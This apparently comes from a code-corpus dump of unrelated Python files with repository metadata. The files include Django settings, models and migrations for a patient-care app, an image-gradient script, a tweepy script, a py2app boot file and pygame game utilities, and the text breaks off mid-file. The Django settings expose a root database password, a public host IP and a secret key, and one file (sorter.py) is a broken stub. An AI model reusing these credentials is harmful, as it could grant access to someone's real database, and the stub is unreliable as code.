f_path = raw_input('Enter path : ')
for hgx in glob.glob("*favicon*"):
os.remove(hgx)
for hgx in glob.glob("*full-frame*"):
os.remove(hgx)
for hgx in glob.glob("*eyeglasses"):
print hgx
os.remove(hgx)
| [
"[email protected]"
] | |
f8568e77c3e2310bd5d6c4a15288dd45bdcee7e4 | 3aaa2da49ef0f20897aa6580dc976d362d944aa8 | /parserInfor/parserInfor/settings.py | 5be1b2fbdf83292e2c4568e96ce0e2b77cdd6cc9 | [] | no_license | loyoen/parser | 8b995a70c06daba109a977ed888488a13a174e3e | 48323a01696d6cf4909fe1ca659acb825e6e2f3c | refs/heads/master | 2016-09-05T13:47:17.552809 | 2013-09-21T06:09:22 | 2013-09-21T06:09:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,624 | py | # Django settings for parserInfor project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'cisimi', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'root',
'PASSWORD': 'good7788',
'HOST': '60.190.203.111', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = MEDIA_ROOT = os.path.join(os.path.dirname(__file__),'site_media').replace('\\','/')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'o&+ss2f3d^(c%no$pzqnk+9l+fc51h#1i^ssq@w)bj+*n*yoe1'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'parserInfor.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'parserInfor.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(__file__), 'template').replace('\\','/'),
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'myparser',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
| [
"Zenas@MICROSO-5K70BVP.(none)"
] | Zenas@MICROSO-5K70BVP.(none) |
0d4d2f42a60514dcf7d62b89f9738cd4d00ee8a1 | 68b95073dd0b07314fdfd0a906fd652f5f402eaf | /hog.py | 4d8954d10db373049fc9aa6ecc260eaa918698a0 | [] | no_license | suryaakella/computer-vision-moocs | 23b455d43eb1501d764178e1a0a22bc47b23cad4 | 213099e8d3e5e58feae69b045518fb9463919e60 | refs/heads/main | 2023-01-22T19:12:33.330676 | 2020-11-24T15:01:35 | 2020-11-24T15:01:35 | 315,661,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,678 | py | import matplotlib.pyplot as plt
import cv2
import numpy as np
import math
def gaussian(x,y,std):
return (1/((std**2)*(2*math.pi))*np.exp(((-1*(x**2 + y**2))/2*(std**2))))
originalimg = cv2.imread('/home/surya/Documents/computer_vision/CAP5415_Fall2012_PA3_data/Seq1/0133.jpeg',0)
originalimg=cv2.resize(originalimg, (64,128))
def conv(originalimg, k,size,std1):
if(k=='averaging'):
gaus = np.ones((size,size))/9
elif(k=='gaussian'):
gaus = np.zeros((3,3))
std = std1
mean = np.array(np.arange(-3,3))
for i in range(-1,2):
for j in range(-1,2):
gaus[i+1][j+1] = gaussian(i,j,std1)
# print('gaus',gaus)
elif(k=='sobel1'):
gaus = np.array([[-1,-2,-1],[0,0,0],[1,2,1]])
size = 3
elif(k=='sobel2'):
gaus = np.array([[-1,0,1],[-2,0,2],[-1,0,1]])
size = 3
elif(k=='p1'):
gaus = np.array([[-1,0,1],[-1,0,1],[-1,0,1]])
size = 3
elif(k=='p2'):
gaus = np.array([[1,1,1],[0,0,0],[-1,-1,-1]])
size = 3
c = np.zeros((int(originalimg.shape[0]),int(originalimg.shape[1])))
for i in range(0,int(originalimg.shape[0])):
for j in range(0,int(originalimg.shape[1])):
patch = originalimg[i:i+3,j:j+3]
try:
c[i+1][j+1] = (np.sum(np.multiply(patch,gaus)))
except:
pass
return c
fx = conv(originalimg,'p1',3,1)
fy = conv(originalimg,'p2',3,1)
m = np.sqrt(fx**2 + fy**2)
plt.subplot(1,2,1)
plt.imshow(m,cmap='gray')
plt.title('magnitude')
orientation = np.arctan(fy/fx)
plt.subplot(1,2,2)
plt.hist(orientation)
plt.title('direction')
plt.show()
| [
"[email protected]"
] | |
3541096c6c8edd5bcc12e74e32dadbffe14fcc02 | 9b452055112184e16259ba95d83e0746d9e57714 | /FennicaTrends/serious-spin-master/data/python/countRelativeWeights.py | a2fcfb623573ab41ce92ae5c1872899437f2dad3 | [
"MIT"
] | permissive | helsinkithinkcompany/wide | 9bb836f9b50a65093d32c9b2827dbbf5a7bfd42f | 637189b83499bb612fcefa94e2af88f1f920849c | refs/heads/master | 2020-03-28T17:25:38.619458 | 2018-10-30T17:40:40 | 2018-10-30T17:40:40 | 148,788,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | import json, sys
from math import pow
# FILE HANDLING #
def writeJsonToFile(json_data, file_path):
try:
with open(file_path, 'w') as outfile:
json.dump(json_data, outfile)
return True
except Exception as e:
print(e)
print('Failed to dump json to file ' + file_path)
return False
def getJsonFromFile(file_path):
try:
with open(file_path) as infile:
json_data = json.load(infile)
return json_data
except Exception as e:
print(e)
print('Failed to get json from file ' + file_path)
return False
if len(sys.argv) < 2:
print("Usage: %s fennica-all.json"%sys.argv[0])
sys.exit()
fennica_all = getJsonFromFile(sys.argv[1])
PATH_TO_FENNICA_ALL_JSON_FILE = './fennica-graph.json'
# DATA HANDLING #
def countMagicValue(this, mean, max):
if int(this) - int(mean) == 0:
return 50
elif int(this) < int(mean):
diff = 1 + (int(mean) - int(this)) / mean
return int(50 - 50 * (1 - 1 / diff))
elif int(this) > int(mean):
diff = 1 + (int(this) - int(mean))/ (max - mean)
return int(50 + 50 * (1 - 1 / diff))
else:
return 50
def getMeanAndMaxOfYear(json_data, year):
sum = 0
count = 0
max = 0
for word in json_data[year]:
count = count + 1
sum = sum + json_data[year][word]
if max < json_data[year][word]:
max = json_data[year][word]
return float(sum)/float(count), float(max)
def changeWordWeightsToRelativeOfMeanByYear(json_data, year):
mean, max = getMeanAndMaxOfYear(json_data, year)
for word in json_data[year]:
json_data[year][word] = countMagicValue(float(json_data[year][word]), mean, max)
def changeWordWeightsToRelative(json_data):
for year in json_data:
changeWordWeightsToRelativeOfMeanByYear(json_data, year)
return json_data
fennica_all_relative = changeWordWeightsToRelative(fennica_all)
writeJsonToFile(fennica_all_relative, 'fennica-graph.json')
| [
"[email protected]"
] | |
61acdb8d432dd34f001d2c0e97dfee241beada2b | 0bcc7dba1f5f1738f9b11a259e63edcb39795a41 | /INFO1110/Lab6/sorter.py | c8f145941317de52a6354f0f760cb64eeb835ec3 | [] | no_license | mlumsden001/University-Notes | 3704b0a0e49a24d965aa24658a607a89c1dfa7da | e0040192204360e3bd3df7087738913c7763a331 | refs/heads/master | 2021-08-15T20:19:18.527082 | 2021-03-22T05:41:11 | 2021-03-22T05:41:11 | 246,731,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | import sys
def sort(sys.argv[1]):
| [
"[email protected]"
] | |
e8a926f2b15c77f420a41eec66fda7a533d53b54 | 7d07cff7e0900fecb15d433eb9962a809585447f | /hit_me_please/hitters/models.py | ab8922594a759c7f8b586d3cb1c5d6338a87c1b0 | [
"MIT"
] | permissive | kaotu/HitMePls | 4dcb5280b50333b92d29de90260457680a617cc8 | 7b105e39517300faf9ef31b455656d69746cdcef | refs/heads/master | 2022-12-10T03:30:06.488569 | 2019-06-04T02:44:04 | 2019-06-04T02:44:04 | 189,680,252 | 0 | 0 | MIT | 2022-12-09T04:42:41 | 2019-06-01T02:14:03 | JavaScript | UTF-8 | Python | false | false | 131 | py | from django.db import models
# Create your models here.
class Hitter(models.Model):
email = models.EmailField(max_length=300)
| [
"[email protected]"
] | |
32c207f3631eab9b520c22cef2980be18016e080 | 8b7d98c5077d1607568460ce5ae8da801b11293a | /accounts/forms.py | f47b51e9149eed83879485476cefed208ceca865 | [] | no_license | Th0rn-dev/kiteupru | de0e93fd791522433e2ab34efac1e86a0cb0f613 | df240ff50f51b390f7e27ca35841c6482642d97d | refs/heads/master | 2023-05-04T13:44:05.561708 | 2021-05-30T19:01:59 | 2021-05-30T19:45:47 | 372,293,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django import forms
from .models import Profile
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
fields = ('avatar',) | [
"[email protected]"
] | |
083b8cd284fd20bc221ed0ecb3cbff91911ffaeb | 73e29861ef02f3c95fbcdf095b8d539bbc5fd61f | /apps/news/serializers.py | 79c74eea0caeec78406002bf1beb61613eab759d | [] | no_license | jc5055/xfz | 8cbc6b356f5707185d09df07f9bb9d0b03593e91 | 95c275e65543b379fc6b25489c381edbc41dc034 | refs/heads/master | 2022-12-11T18:59:52.464298 | 2020-09-02T09:07:32 | 2020-09-02T09:07:32 | 289,928,051 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from rest_framework import serializers
from .models import News, NewsCategory, Comment, Banner
from apps.xfzauth.serializers import AuthSerializer
class NewsCategorySerializers(serializers.ModelSerializer):
class Meta:
model = NewsCategory
fields = ('id', 'name')
class NewsSerializer(serializers.ModelSerializer):
category = NewsCategorySerializers()
author = AuthSerializer()
class Meta:
model = News
fields = ('id', 'title', 'desc', 'thumbnail', 'pub_time', 'category', 'author')
class NewsCommentSerializer(serializers.ModelSerializer):
author = AuthSerializer()
class Meta:
model = Comment
fields = ('id', 'content', 'pub_time', 'author')
class BannerSerializer(serializers.ModelSerializer):
class Meta:
model = Banner
fields = ('id', 'priority', 'image_url', 'link_to')
| [
"[email protected]"
] | |
615fbeee59e36cc1c78df2d2ff2d9ed58a64158d | f555fbb80462bd5ad260256520bd324109fd5fc7 | /users/migrations/0001_initial.py | 74de2b26de2064e35d33dd7db5aa427540ec3b2c | [] | no_license | Sunki12/Accompany | 9acb4a48584eaf3693b0627676ec4fd0c3ee1b73 | 4100989cc545dc9104702d99b31d9c3c234c986c | refs/heads/master | 2020-07-10T10:43:18.918395 | 2019-08-25T04:09:51 | 2019-08-25T04:09:51 | 204,244,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,145 | py | # Generated by Django 2.2.2 on 2019-06-28 11:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Doctor',
fields=[
('name', models.CharField(max_length=128, verbose_name='姓名')),
('password', models.CharField(max_length=60, verbose_name='密码')),
('phone_number', models.CharField(max_length=11, unique=True, verbose_name='手机号')),
('doctor_id', models.CharField(max_length=18, primary_key=True, serialize=False, verbose_name='身份证号')),
('working_unit', models.CharField(max_length=30, verbose_name='从业单位')),
('working_num', models.CharField(max_length=30, verbose_name='工号')),
('working_title', models.CharField(max_length=30, verbose_name='职称')),
('resume', models.TextField(max_length=1000, verbose_name='简介')),
],
options={
'db_table': 'Doctor',
},
),
migrations.CreateModel(
name='Guardian',
fields=[
('name', models.CharField(max_length=128, verbose_name='姓名')),
('password', models.CharField(max_length=60, verbose_name='密码')),
('phone_number', models.CharField(max_length=11, unique=True, verbose_name='手机号')),
('guardian_id', models.CharField(max_length=18, primary_key=True, serialize=False, verbose_name='身份证号')),
],
options={
'db_table': 'guardian',
},
),
migrations.CreateModel(
name='Patient',
fields=[
('name', models.CharField(max_length=128, verbose_name='姓名')),
('password', models.CharField(max_length=60, verbose_name='密码')),
('phone_number', models.CharField(max_length=11, unique=True, verbose_name='手机号')),
('patient_id', models.CharField(max_length=18, primary_key=True, serialize=False, verbose_name='身份证号')),
('longitude', models.CharField(blank=True, max_length=30, null=True, verbose_name='经度')),
('latitude', models.CharField(blank=True, max_length=30, null=True, verbose_name='纬度')),
('heart_rate', models.CharField(blank=True, max_length=10, null=True, verbose_name='心率')),
('blood_pressure', models.CharField(blank=True, max_length=10, null=True, verbose_name='血压')),
('step_number', models.CharField(blank=True, max_length=10, null=True, verbose_name='步数')),
('gender', models.CharField(blank=True, choices=[('male', '男'), ('female', '女')], max_length=6, null=True, verbose_name='性别')),
('marriage', models.CharField(blank=True, choices=[('YES', '已婚'), ('NO', '未婚')], max_length=20, null=True, verbose_name='婚姻状况')),
('age', models.CharField(blank=True, max_length=6, verbose_name='年龄')),
('job', models.CharField(blank=True, max_length=200, null=True, verbose_name='工作')),
('nation', models.CharField(blank=True, max_length=20, null=True, verbose_name='民族')),
('native_place', models.CharField(blank=True, max_length=200, null=True, verbose_name='籍贯')),
('address', models.CharField(blank=True, max_length=200, null=True, verbose_name='住址')),
('main_illness', models.CharField(blank=True, max_length=100, null=True, verbose_name='主要疾病')),
],
options={
'db_table': 'patient',
},
),
migrations.CreateModel(
name='VerifyCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=10, verbose_name='验证码')),
('phone_number', models.CharField(max_length=11, verbose_name='手机号')),
('add_time', models.CharField(max_length=50, verbose_name='添加时间')),
],
),
migrations.CreateModel(
name='TreatShip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('illness_now', models.TextField(blank=True, max_length=1000, null=True, verbose_name='现今病情')),
('illness_past', models.TextField(blank=True, max_length=1000, null=True, verbose_name='以往病史')),
('sub_visit_time', models.CharField(blank=True, max_length=30, null=True, verbose_name='复诊时间')),
('treatment', models.TextField(blank=True, max_length=1000, null=True, verbose_name='治疗方案')),
('medicine', models.TextField(blank=True, max_length=1000, null=True, verbose_name='服药信息')),
('treat_time', models.CharField(max_length=200, verbose_name='治疗时间')),
('doctor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Doctor', verbose_name='医生身份证号')),
('guardian', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Guardian')),
('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='treatment', to='users.Patient', verbose_name='病人身份证号')),
],
options={
'db_table': 'treatShip',
'unique_together': {('patient', 'doctor', 'guardian', 'treat_time')},
},
),
migrations.CreateModel(
name='GuardianShip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('guard_time', models.CharField(max_length=30, null=True, verbose_name='监护时间')),
('guardian', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Guardian', verbose_name='监护人身份证号')),
('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Patient', verbose_name='病人身份证号')),
],
options={
'db_table': 'guardianShip',
},
),
migrations.AddField(
model_name='guardian',
name='cares',
field=models.ManyToManyField(related_name='carers', through='users.GuardianShip', to='users.Patient'),
),
migrations.AddField(
model_name='doctor',
name='patients',
field=models.ManyToManyField(related_name='doctors', through='users.TreatShip', to='users.Patient'),
),
migrations.AlterUniqueTogether(
name='doctor',
unique_together={('working_unit', 'working_num')},
),
migrations.CreateModel(
name='Appointment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('appointment_time', models.CharField(max_length=50, verbose_name='预约时间')),
('appointment_state', models.CharField(choices=[('appoint', '预约'), ('completed', '已完成')], max_length=10)),
('doctor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Doctor')),
('guardian', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Guardian')),
('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Patient')),
],
options={
'db_table': 'appointment',
'unique_together': {('patient', 'doctor', 'guardian', 'appointment_time')},
},
),
]
| [
"[email protected]"
] | |
a3d39c7cacd05406c589fa1898cdea4bc0e3e49a | 51c57fd203d75d70dea31ae9816f45b046411261 | /simple_vect_field/vector_field.py | 7585eedd34b24cc4d35d4e4a006e6893f131256a | [] | no_license | HoughGrant/matplotlib_art | 376642410afd1737583aa8ef1ca7f6e144b3babd | 6722f2a7906d190390ab7bbc29a5ea5237bcb0fb | refs/heads/main | 2023-06-25T21:06:19.118253 | 2021-07-26T01:51:36 | 2021-07-26T01:51:36 | 335,814,007 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | import matplotlib.pyplot as plt
import numpy as np
def run_1():
def v_x(x: float, y: float) -> float:
""" x_velocity vector field """
return -y ** 2 - 5 * y + 0.2 * x * y ** 3
def v_y(x: float, y: float) -> float:
""" y_velocity vector field """
return -x ** 2 + 2 * x + 5 * y * x
def evolve_point(point: tuple, delta: float) -> tuple:
""" moves point according to previously defined velocity vector fields """
x_updated = point[0] + v_x(*point) * delta
y_updated = point[1] + v_y(*point) * delta
return x_updated, y_updated
def create_path(initial_point: tuple, num_steps: int, delta: float) -> np.ndarray:
""" Moves a point through a vector field """
traveled_points = [initial_point]
for _ in range(num_steps):
new_point = evolve_point(traveled_points[-1], delta)
traveled_points.append(new_point)
return np.array(traveled_points)
plt.figure()
initial_point = (0, 0)
all_clusters = {}
for cluster_id, perturb in enumerate(np.linspace(0.1, 1, 10)):
tmp_initial_point = (initial_point[0] + perturb, initial_point[1] + perturb)
traveled_points = create_path(tmp_initial_point, num_steps=100000, delta=0.01)
all_clusters[cluster_id] = traveled_points
plt.scatter(traveled_points[:, 0], traveled_points[:, 1])
plt.show()
# plot vector field
if __name__ == '__main__':
run_1()
| [
"[email protected]"
] | |
ca2956bc2eed953b908d3edf74589e6ded2436d9 | 90449f55230622e06c85bed858acbbde85b2f399 | /dist/suffer.app/Contents/Resources/__boot__.py | d17f1a81d0efc2a657313e2adfd05e84ce000918 | [] | no_license | jalovisko/SMeter | 1d5c5dcbeb9b824f961b3d35d5c36edda0b7bf8d | 3577c1eef37429051abbb70137cb67335a5a2601 | refs/heads/master | 2021-04-12T10:49:47.092091 | 2017-07-10T10:46:59 | 2017-07-10T10:46:59 | 94,534,643 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,251 | py | def _reset_sys_path():
# Clear generic sys.path[0]
import sys
import os
resources = os.environ['RESOURCEPATH']
while sys.path[0] == resources:
del sys.path[0]
_reset_sys_path()
def _site_packages():
import site
import sys
import os
paths = []
prefixes = [sys.prefix]
if sys.exec_prefix != sys.prefix:
prefixes.append(sys.exec_prefix)
for prefix in prefixes:
paths.append(
os.path.join(
prefix, 'lib', 'python' + sys.version[:3], 'site-packages'))
if os.path.join('.framework', '') in os.path.join(sys.prefix, ''):
home = os.environ.get('HOME')
if home:
# Sierra and later
paths.append(os.path.join(home, 'Library', 'Python',
sys.version[:3], 'lib', 'python',
'site-packages'))
# Before Sierra
paths.append(os.path.join(home, 'Library', 'Python',
sys.version[:3], 'site-packages'))
# Work around for a misfeature in setuptools: easy_install.pth places
# site-packages way to early on sys.path and that breaks py2app bundles.
# NOTE: this is hacks into an undocumented feature of setuptools and
# might stop to work without warning.
sys.__egginsert = len(sys.path)
for path in paths:
site.addsitedir(path)
_site_packages()
def _chdir_resource():
import os
os.chdir(os.environ['RESOURCEPATH'])
_chdir_resource()
def _setup_ctypes():
from ctypes.macholib import dyld
import os
frameworks = os.path.join(os.environ['RESOURCEPATH'], '..', 'Frameworks')
dyld.DEFAULT_FRAMEWORK_FALLBACK.insert(0, frameworks)
dyld.DEFAULT_LIBRARY_FALLBACK.insert(0, frameworks)
_setup_ctypes()
def _path_inject(paths):
import sys
sys.path[:0] = paths
_path_inject(['/Users/Nick/Google Drive/Skoltech/Summer Immersion/SMeter'])
import re
import sys
cookie_re = re.compile(b"coding[:=]\s*([-\w.]+)")
if sys.version_info[0] == 2:
default_encoding = 'ascii'
else:
default_encoding = 'utf-8'
def guess_encoding(fp):
for i in range(2):
ln = fp.readline()
m = cookie_re.search(ln)
if m is not None:
return m.group(1).decode('ascii')
return default_encoding
def _run():
global __file__
import os
import site # noqa: F401
sys.frozen = 'macosx_app'
argv0 = os.path.basename(os.environ['ARGVZERO'])
script = SCRIPT_MAP.get(argv0, DEFAULT_SCRIPT) # noqa: F821
sys.argv[0] = __file__ = script
if sys.version_info[0] == 2:
with open(script, 'rU') as fp:
source = fp.read() + "\n"
else:
with open(script, 'rb') as fp:
encoding = guess_encoding(fp)
with open(script, 'r', encoding=encoding) as fp:
source = fp.read() + '\n'
BOM = b'\xef\xbb\xbf'.decode('utf-8')
if source.startswith(BOM):
source = source[1:]
exec(compile(source, script, 'exec'), globals(), globals())
DEFAULT_SCRIPT='/Users/Nick/Google Drive/Skoltech/Summer Immersion/SMeter/suffer.py'
SCRIPT_MAP={}
try:
_run()
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
9a1ebe0e49c72ca6b28bb08e32c90d03154eff35 | 40d2172ed25d7fce68e169eecc6c1155722b62b4 | /tweepy-statuses.py | fb95128bafda0b72e103dbe388f02de0f12b422f | [] | no_license | mortie23/twitter-twurl-csv | 51933bd59987602add3183d29bc379242d8ad4a0 | da51ce7376f155ddf5eaa2c41c1c50c648bbb3db | refs/heads/master | 2020-09-21T10:09:04.491949 | 2020-01-29T03:31:55 | 2020-01-29T03:31:55 | 224,760,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,560 | py | #!/usr/bin/python3
## Author: Christopher Mortimer
## Date: 2020-01-15
## Desc: Get all statuses based on a list of ids
## Depend: pip3 install tweepy --user
## pip3 install pandas --user
## pip3 install os --user
import sys
## Add the parent directory containing the auth files
sys.path.append('../')
import myAuth
import os
import tweepy as tw
import pandas as pd
#consumer_key='from myAuth file in parent directory'
#consumer_secret='from myAuth file in parent directory'
#access_token='from myAuth file in parent directory'
#access_token_secret='from myAuth file in parent directory'
auth = tw.OAuthHandler(myAuth.consumer_key, myAuth.consumer_secret)
auth.set_access_token(myAuth.access_token, myAuth.access_token_secret)
api = tw.API(auth, wait_on_rate_limit=True)
search_words = "@mortie23"
date_since = "2018-11-16"
# Collect tweets as object
tweets = tw.Cursor(api.search,q=search_words,lang="en",since=date_since).items(5)
# Iterate and print tweets
for i, tweet in enumerate(tweets):
print(i,":\n")
print(tweet.text)
print("\n\nNow without retweets\n\n")
## Get tweets without retweets
new_search = search_words + " -filter:retweets"
#print(new_search)
tweets = tw.Cursor(api.search,q=new_search,lang="en",since=date_since).items(10)
for i, tweet in enumerate(tweets):
print(i,":\n")
print(tweet.text)
#print(vars(tweets))
## User timeline
print("\n\nNow a timeline\n\n")
tweets = tw.Cursor(api.user_timeline, id="mortie23").items(10)
for i, tweet in enumerate(tweets):
print(i,":\n")
print(tweet.text) | [
"[email protected]"
] | |
a4179dd3d6f20a183b344f05c1d32a059c61e4a6 | c3eabffad6813a285ea1aa554ff05ef3e798bfa7 | /bubbleshoot/utils.py | d1690f1bba79a87551017310240add1a42ba2277 | [] | no_license | ranjian0/mini-games | 8a96eef730cffccd548cd70dee3349ad31502ba3 | 34bb48456ed6e3fc0d82a4c936e01c48bf0e8f47 | refs/heads/master | 2020-03-19T00:09:24.914583 | 2020-01-08T15:32:46 | 2020-01-08T15:32:46 | 135,455,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,516 | py | import os
import math, random
import pygame as pg
from pygame.sprite import *
# from player import Player
# from enemy import EnemySpawner
TRANSPARENT = (0, 0, 0, 0)
def random_pos(target, dist):
pad = 100
max_ = pg.display.get_surface().get_size()
pos = [random.randint(0, n - pad) for n in max_]
# Ensure the random point is more that dist away from target
if pg.math.Vector2(pos[0] - target[0], pos[1] - target[1]).length() < dist:
return random_pos(target, dist)
else:
return pos
def media_path(fn):
path = os.path.join(os.path.dirname(__file__), "media")
return os.path.join(path, fn)
class Bullet(Sprite):
def __init__(self, pos, angle, color=pg.Color("black")):
Sprite.__init__(self)
size = (5, 5)
self.color = color
self.image = self.make_image(size)
self.rect = self.image.get_rect(center=pos)
self.true_pos = list(self.rect.center)
self.angle = -math.radians(angle - 90)
self.speed = 5
def make_image(self, size):
img = pg.Surface(size).convert_alpha()
img.fill(TRANSPARENT)
rect = img.get_rect()
pg.draw.rect(img, self.color, [0, 0, size[0], size[1]])
return img
def update(self, dt):
self.true_pos[0] += math.cos(self.angle) * self.speed
self.true_pos[1] += math.sin(self.angle) * self.speed
self.rect.topleft = self.true_pos
self.remove()
def remove(self):
screen_rect = pg.display.get_surface().get_rect()
if not self.rect.colliderect(screen_rect):
self.kill()
class DamageBar(Sprite):
def __init__(self, pos, size=(200, 25), color=pg.Color("green")):
Sprite.__init__(self)
self.size = size
self.pos = pos
self.color = color
self.image = self.make_image(size)
self.rect = self.image.get_rect(center=pos)
self.true_pos = list(self.rect.center)
def make_image(self, size, fill_percent=1):
img = pg.Surface(size).convert_alpha()
img.fill(TRANSPARENT)
rect = img.get_rect()
pg.draw.rect(img, pg.Color("black"), rect)
rect2 = rect.inflate(-10, -10).copy()
rect2.width *= fill_percent
pg.draw.rect(img, self.color, rect2)
return img
def update(self, sprite):
health_percent = sprite.health / sprite.max_health
self.image = self.make_image(self.size, health_percent)
self.rect = self.image.get_rect(center=self.rect.center)
class Option:
hovered = False
def __init__(self, text, pos, font):
self.text = text
self.pos = pos
self.font = font
self.set_rect()
self.draw()
def draw(self):
self.set_rend()
screen = pg.display.get_surface()
screen.blit(self.rend, self.rect)
def set_rend(self):
self.rend = self.font.render(self.text, True, self.get_color())
def get_color(self):
if self.hovered:
return (255, 255, 255)
else:
return (100, 100, 100)
def set_rect(self):
self.set_rend()
self.rect = self.rend.get_rect()
self.rect.center = self.pos
class MainMenu:
def __init__(self):
self.font = pg.font.Font(None, 72)
size = pg.display.get_surface().get_size()
off_x = size[0] / 2
off_y = size[1] / 2
self.options = [
Option("PLAY GAME", (off_x, off_y - 80), self.font),
Option("CREDITS", (off_x, off_y), self.font),
Option("EXIT", (off_x, off_y + 80), self.font),
]
# Title image
self.title = pg.image.load(media_path("title.png"))
self.title_rect = self.title.get_rect(center=(off_x, 70))
def draw(self, *args):
# Draw title image
screen = pg.display.get_surface()
screen.blit(self.title, self.title_rect)
# Draw Options
for option in self.options:
if option.rect.collidepoint(pg.mouse.get_pos()):
option.hovered = True
else:
option.hovered = False
option.draw()
def on_mouse(self):
for option in self.options:
if option.rect.collidepoint(pg.mouse.get_pos()):
return option.text
class Credits:
def __init__(self):
size = pg.display.get_surface().get_size()
# Credits Text
self._font = pg.font.Font(None, 30)
self.text = """
ESCAPE SHOOTER
Author
````````
Ian Ichung'wah Karanja
Description
`````````````
This game was created between 1/5/17 and 3/5/17.
